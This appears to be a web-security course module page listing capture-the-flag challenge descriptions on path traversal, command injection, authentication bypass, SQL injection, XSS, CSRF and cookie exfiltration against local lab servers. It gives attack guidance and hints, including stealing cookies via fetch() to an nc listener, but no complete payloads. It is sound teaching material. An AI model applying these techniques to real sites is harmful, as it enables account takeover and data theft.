Web Security


Intro to Cybersecurity

You have learned Linux and HTTP. Now, let's put these together!

Web content is served up via the internet by web servers, and like everything else, these web servers, and the pages that they serve up, contain vulnerabilities! In this module, you will wrap yourself in the mysteries of the web, exploring various types of vulnerabilities that can occur. As you work through this module, keep in mind, these aren't theoretical curiosities: these are common, critical vulnerabilities that occur all the time in the modern web and can lead to massive data breaches, account takeover, and more.

Now, dive in, and hack!


Lectures and Reading


Challenges

This level will explore the intersection of Linux path resolution, when done naively, and unexpected web requests from an attacker. We've implemented a simple web server for you --- it will serve up files from /challenge/files over HTTP. Can you trick it into giving you the flag?

The webserver program is /challenge/server. You can run it just like any other challenge, then talk to it over HTTP (using a different terminal or a web browser). We recommend reading through its code to understand what it is doing and to find the weakness!


HINT: If you're wondering why your solution isn't working, make sure what you're trying to query is what is actually being received by the server! curl -v [url] can show you the exact bytes that curl is sending over.

The previous level's path traversal happened because of a disconnect between:

  1. The developer's awareness of the true range of potential input that an attacker might send to their application (e.g., the concept of an attacker sending characters that have special meaning in paths).
  2. A gap between the developer's intent (the implementation makes it clear that we only expect files under the /challenge/files directory to be served to the user) and the reality of the filesystem (where paths can go "back" up a directory level).

This level tries to stop you from traversing the path, but does it in a way that clearly demonstrates a further lack of the developer's understanding of how tricky paths can truly be. Can you still traverse it?

Now, imagine getting more crazy than these security issues between the web server and the file system. What about interactions between the web server and the whole Linux shell?

Depressingly often, developers rely on the command line shell to help with complex operations. In these cases, a web server will execute a Linux command and use the command's results in its operation (a frequent usecase of this, for example, is the Imagemagick suite of commands that facilitate image processing). Different languages have different ways to do this (the simplest way in Python is os.system, but we will mostly be interacting with the more advanced subprocess.check_output), but almost all suffer from the risk of command injection.

In path traversal, the attacker sent an unexpected character (.) that caused the filesystem to do something unexpected to the developer (look in the parent directory). The shell, similarly, is chock full of special characters that cause effects unintended by the developer, and the gap between what the developer intended and the reality of what the shell (or, in previous challenges, the file system) does holds all sorts of security issues.

For example, consider the following Python snippet that runs a shell command:

os.system(f"echo Hello {word}")

The developer clearly intends the user to send something like Hackers, and the result to be something like the command echo Hello Hackers. But the hacker might send anything the code doesn't explicitly block. Recall what you learned in the Chaining module of the Linux Luminarium: what if the hacker sends something containing a ;?

In this level, we will explore this exact concept. See if you can trick the level and leak the flag!

Many developers are aware of things like command injection, and try to prevent it. In this level, you may not use ;! Can you think of another way to command-inject? Recall what you learned in the Piping module of the Linux Luminarium...

An interesting thing about command injection is that you don't get to choose where in the command the injection occurs: the developer accidentally makes that choice for you when writing the program. Sometimes, these injections occur in uncomfortable places. Consider the following:

os.system(f"echo Hello '{word}'")

Here, the developer tried to convey to the shell that word should really be only one word. The shell, when given arguments in single quotes, treats otherwise-special characters like ;, $, and so on as just normal characters, until it hits the closing single quote (').

This level gives you this scenario. Can you bypass it?


HINT: Keep in mind that there will be a ' character right at the end of whatever you inject. In the shell, all quotes must be matched with a partner, or the command is invalid. Make sure to craft your injection so that the resulting command is valid!

Calling shell commands to carry out work, or "shelling out" as it is often termed, is dangerous. Any part of a shell command is potentially injectible! In this level, we'll practice injecting into a slightly different part of a slightly different command.

Programs tend to shell out to do complex internal computation. This means that you might not always get sent the resulting output, and you will need to do your attack blind. Try it in this level: without the output of your injected command, get the flag!

Sometimes, developers try very hard to filter out potentially dangerous characters. The success in this challenge is almost perfect, but not quite... You'll be stumped for a while, but will laugh at its familiarity when you figure out the solution!

Of course, web applications can have security vulnerabilities that have nothing to do with the shell. A common type of vulnerability is an Authentication Bypass, where an attacker can bypass the typical authentication logic of an application and log in without knowing the necessary user credentials.

This level challenges you to explore one such scenario. This specific scenario arises because, again, of a gap between what the developer expects (that the URL parameters set by the application will only be set by the application itself) and the reality (that attackers can craft HTTP requests to their hearts content).

The goal here is not only to let you experience how such vulnerabilites might arise, but to familiarize you with databases: places where web applications stored structured data. As you'll see in this level, data is stored into and read from these databases using a language called the Structured Query Language, or SQL (often pronounced like "sequel") for short. SQL will become incredibly relevant later, but for now, it is an incidental part of the challenge.

Anyways, go and bypass this authentication to log in as the admin user and get the flag!

Authentication bypasses are not always so trivial. Sometimes, the logic of the application might look correct, but again, the gap between what the developer expects to be true and what will actually be true rears its ugly head. Give this level a try, and remember: you control the requests, including all the HTTP headers sent!

Of course, these sorts of security gaps abound! For example, in this level, the specification of the logged in user is actually secure. Instead of get parameters or raw cookies, this level uses an encrypted session cookie that you will not be able to mess with. Thus, your task is to get the application to actually authenticate you as admin!

Luckily, as the name of the level suggests, this application is vulnerable to a SQL injection. A SQL injection, conceptually, is to SQL what a Command Injection is to the shell. In Command Injections, the application assembled a command string, and a gap between the developer's intent and the command shell's actual functionality enabled attackers to carry out actions unintended by the attacker. A SQL injection is the same: the developer builds the application to make SQL queries for certain goals, but because of the way these queries are assembled by the application logic, the resulting actions of the SQL query, when executed by the database, can be disastrous from a security perspective.

Command injections don't have a clear solution: the shell is an ancient piece of technology, and the interfaces to the shell have ossified decades ago and are very hard to change. SQL is somewhat more nimble, and most databases now provide interfaces that are very resistant to being SQL-injectible. In fact, the authentication bypass levels used such interfaces: they are very vulnerable, but not to SQL injection.

This level, on the other hand, is SQL injectible, as it purposefully uses a slightly different way to make SQL queries. When you find the SQL query into which you can inject your input (hint: it is the only SQL query to substantially differ between this level and the previous level), look at what the query looks like right now, and what unintended conditions you might inject. The quintessential SQL injection adds a condition so that an application can succeed without knowing the password. How can you accomplish this?

The previous level's SQL injection was quite simple to pull off and still have a valid SQL query. This was, in part, because your injection happened at the very end of the query. In this level, however, your injection happens partway through, and there is (a bit) more of the SQL query afterwards. This complicates matters, because the query must remain valid despite your injection.

If you recall, your command injection exploits typically caused additional commands to be executed. So far, your SQL injections have simply modified the conditions of existing SQL queries. However, similar to how the shell has ways to chain commands (e.g., ;, |, etc), some SQL queries can be chained as well!

An attacker's ability to chain SQL queries has extremely powerful potential. For example, it allows the attacker to query completely unintended tables or completely unintended fields in tables, and leads to the types of massive data disclosures that you read about on the news.

This level will require you to figure out how to chain SQL queries in order to leak data. Good luck!

So far, the database structure has been known to you (e.g., the name of the users table), allowing you to knowingly craft your queries. As a developer, you might be tempted to prevent this by, say, randomizing your table names, so that an attacker can't specify them to query data that they are not supposed to. Unfortunately, this is not the slam dunk that you might think it is.

Databases are complex and much too clever for their own good. For example, almost all modern databases keep the database layout specification itself in a table. Attackers can query this table to get the table names, field names, and whatever other information they might need!

In this level, the developers have randomized the name of the (previously known as) users table. Find it, and find the flag!

SQL injection happen in all sorts of places in an application and, like command injections, sometimes the result of the query is not sent back to you. With command injections, this case is easier: the commandline is so powerful that you can do a lot of things even blindly. With SQL injections, this is sometimes not the case. For example, unlike some other databases, the SQLite database used in this module cannot access the filesystem, execute commands, and so on.

So, if the application does not show you the data resulting from your SQL injection, how do you actually leak the data? Sometimes, even if the actual data is not shown, you can recover one bit! If the result of a query can make the application act two different ways (say, redirecting to an "Authentication Success" page versus an "Authentication Failure" page), then an attacker can carefully craft yes/no questions that they can get answers to.

This challenge gives you exactly this scenario. Can you leak the flag?

Semantic gaps can occur (and lead to security issues) at the interface of any two technologies. So far, we have seen them happen between:

  • A web application and the file system, leading to path traversal.
  • A web application and the command line shell, leading to command injection.
  • A web application and the database, leading to SQL injection.

One part of the web application story that we have not yet looked at is the web browser. We will remedy that oversight with this challenge.

A modern web browser is an extraordinarily complex piece of software. It renders HTML, executes JavaScript, parses CSS, lets you access pwn.college, and much much more. Specifically important to our purposes is the HTML that you have seen being generated by every challenge in this module. When the web application generated paths, we ended up with path traversals. When the web application generated shell commands, we ended up with shell injections. When the web application generated SQL queries, we ended up with SQL injections. Do we really think HTML will fare any better? Of course not.

The class of vulnerabilities in which injections occur into client-side web data (such as HTML) is called Cross Site Scripting, or XSS for short (to avoid the name collision with Cascading Style Sheets). Unlike the previous injections, where the victim was the web server itself, the victims of XSS are other users of the web application. In a typical XSS exploit, an attacker will cause their own code to be injected into (typically) the HTML produced by a web application and viewed by a victim user. This will then allow the attacker to gain some control within the victim's browser, leading to a number of potential downstream shenanigans.

This challenge is a very first step in this direction. As before, you will have the /challenge/server web server. This challenge explores something called Stored XSS, which means that data that you store on the server (in this case, posts in a forum) will end up being shown to a victim user. Thus, we need a victim to view these posts! You will now have a /challenge/victim program that simulates a victim user visiting the web server.

Set up your attack and invoke /challenge/victim with the URL that will trigger the Stored XSS. In this level, all you have to do is inject a textbox. If our victim script sees three textboxes, we will give you the flag!

Okay, so injecting some HTML was pretty cool! You can imagine how this can be used to confuse victims, but it gets worse...

In the 1990s, the wise designers of the web invented JavaScript to make websites more interactive. JavaScript lives alongside your HTML, and makes things interesting. For example, this turns your browser into a clock:

<html>
  <body>
    <script>
      document.body.innerHTML = Date();
    </script>
  </body>
</html>

Basically, the HTML <script> tag tells the browser that what is inside that tag is JavaScript, and the browser executes it. I'm sure you can see where this is going...

In the previous level, you injected HTML. In this one, you must use the exact same Stored XSS vulnerability to execute some JavaScript in the victim's browser. Specifically, we want you to execute the JavaScript alert("PWNED") to pop up an alert that informs the victim that they've been pwned. The how of this level is the exact same as the previous one; only the what changes, and suddenly, you're cooking with gas!

In the previous examples, your injection content was first stored in the database (as posts), and was triggered when the web server retrieved it from the database and sent it to the victim's browser. Because the data has to be stored first and retrieved later, this is called a Stored XSS. However, the magic of HTTP GET requests and their URL parameters opens the door to another type of XSS: Reflected XSS.

Reflected XSS happens when a URL parameter is rendered into a generated HTML page in a way that, again, allows the attacker to insert HTML/JavaScript/etc. To carry out such an attack, an attacker typically needs to trick the victim into visiting a very specifically-crafted URL with the right URL parameters. This is unlike a Stored XSS, where an attacker might be able to simply make a post in a vulnerable forum and wait for victims to stumble onto it.

Anyways, this level is a Reflected XSS vulnerability. The /challenge/victim of this challenge takes a URL argument on the commandline, and it will visit that URL. Fool the /challenge/victim into making a JavaScript alert("PWNED"), and you'll get the flag!

Like with SQL injection and command injection, sometimes your XSS occurs in the middle of some non-optimal context. In SQL, you have dealt with injecting into the middle of quotes. In XSS, you often inject into, for example, a textarea, as in this challenge. Normally, text in a textarea is just, well, text that'll show up in a textbox on the page. Can you bust of this context and alert("PWNED")?

As before, the /challenge/victim of this challenge takes a URL argument on the commandline, and it will visit that URL.

Actual XSS exploits try to achieve something more than alert("PWNED"). A very common goal is to use the ability to execute JavaScript inside a victim's browser to initiate new HTTP requests masquerading as the victim. This can be done in a number of ways, including using JavaScript's fetch() function.

This challenge implements a more complex application, and you will need to retrieve the flag out of the admin user's unpublished draft post. After XSS-injecting the admin, you must use the injection to make an HTTP request (as the admin user) to enable you to read the flag. Good luck!

Once an attacker has code execution inside a victim's browser, they can do a lot of things. You've made a GET request in your previous attack, but typically, it's the POST requests that will change application state. This challenge ratchets up the realism: the /publish now needs a POST request. Luckily, fetch supports this!

Go figure out how to POST, and get the flag.

Depending on the attacker's goals, what they might actually be after is the victim's entire account. For example, attackers might use XSS to exfiltrate victim authentication data and then use this data to take over the victim's account.

Authentication data is often stored via browser cookies, such as what happened in Authentication Bypass 2 (but, typically, much more secure). If an attacker can leak these cookies, the result can be disastrous for the victim.

This level stores the authentication data for the logged in user in a cookie. You must use XSS to leak this cookie so that you can, in turn, use it in a request to impersonate the admin user. This exfiltration will happen over HTTP to a server that you run, and everything you need is available via JavaScript's fetch() and its ability to access (some) site cookies.


HINT: By "server that you run", we really mean that listening on a port with nc will be sufficient. Look at the -l and -v options to nc.

You've used XSS to inject JavaScript to cause the victim to make HTTP requests. But what if there is no XSS? Can you just "inject" the HTTP requests directly?

Shockingly, the answer is yes. The web was designed to enable interconnectivity across many different websites. Sites can embed images from other sites, link to other sites, and even redirect to other sites. All of this flexibility represents some serious security risks, and there is almost nothing preventing a malicious website from simply directly causing a victim visitor to make potentially sensitive requests, such as (in our case) a GET request to http://challenge.localhost/publish!

This style of forging requests across sites is called Cross Site Request Forgery, or CSRF for short.

Note that I said almost nothing prevents this. The Same-origin Policy was created in the 1990s, when the web was still young, to (try to) mitigate this problem. SOP prevents a site at one Origin (say, http://www.hacker.com or, in our case, http://hacker.localhost:1337) from interacting in certain security-critical ways with sites at other Origins (say, http://www.asu.edu or, in our case, http://challenge.localhost/). SOP prevents some common CSRF vectors (e.g., when using JavaScript to make a requests across Origins, cookies will not be sent!), but there are plenty of SOP-avoiding ways to, e.g., make GET requests with cookies intact (such as full-on redirects).

In this level, pwnpost has fixed its XSS issues (at least for the admin user). You'll need to use CSRF to publish the flag post! The /challenge/victim of this level will log into pwnpost (http://challenge.localhost/) and will then visit an evil site that you can set up (http://hacker.localhost:1337/). hacker.localhost points to your local workspace, but you will need to set up a web server to serve an HTTP request on port 1337 yourself. Again, this can be done with nc or with a python server (check out http.server!). Because these sites will have different Origins, SOP protections will apply, so be careful about how you forge the request!

Recall that requests that originate from JavaScript run into the Same-Origin Policy, which slightly complicated our CSRF in the previous level. You figured out how to make a GET request without JavaScript. Can you do the same for POST?

Recall that a typical POST request is a result of either a JavaScript-invoked request (no good for SOP) or an HTML form submission. You'll need to do the latter. Of course, the /challenge/victim won't click the Submit button for you --- you'll have to figure out how to do that yourself (HINT: JavaScript can click that button; the request will still count as originating from the form!).

Go POST-CSRF to the flag!

Let's start putting a few things together... A CSRF can lead to many things, including other injections! Use the CSRF in this level to trigger a XSS and invoke an alert("PWNED") somewhere in http://challenge.localhost!


HINT: You will likely want to use JavaScript on your http://hacker.localhost:1337 page to send a GET request with <script> tags in a URL parameter. Be careful: if you encode this JavaScript in your HTML, your <script> tag will have the word </script> in a string (the URL parameter). This string </script> will actually be parsed by your browser as the closing tag of your page's actual <script> tag, and all hell will break loose.

If you encounter this error, I recommend dynamically building that string (e.g., "</s"+"cript>") in the JavaScript that runs on http://hacker.localhost:1337.

Okay, now that you have the CSRF-to-XSS chain figured out, pull of a CSRF leading to an XSS leading to a cookie leak that'll allow you to log in and get the flag!


HINT: Your solution might have two levels of JavaScript: one that runs on your http://hacker.localhost:1337 page, and one that runs in the reflected XSS. We suggest testing the latter first, by manually triggering the page with that input and seeing the result. Furthermore, as this code might be complex, be VERY careful about URL encoding. For example, + will not be encoded to %2b by most URL encoders, but it is a special character in a URL and gets decoded to a space ( ). Needless to say, if you use + in your JavaScript, this can lead to complete havoc.

This level closes the loophole that allowed you to steal cookies from JavaScript. Cookies have a special setting called httponly, and when this is set, the cookie is only accessible in HTTP headers, and not through JavaScript. This is a security measure, aimed to prevent exactly the type of cookie pilfering that you have been doing. Luckily, Flask's default session cookie is set to be httponly, so you cannot steal it from JavaScript.

So, now how would you get the flag with your CSRF-to-XSS shenanigans? Luckily, you don't need the cookie! Once you have JavaScript execution within the page, you can freely fetch() other pages without worrying about the Same Origin Policy, since you now live in the same Origin. Use this, read the page with the flag, and win!


Ranking

This scoreboard reflects solves for challenges in this module after the module launched in this dojo.

Rank Hacker Badges Score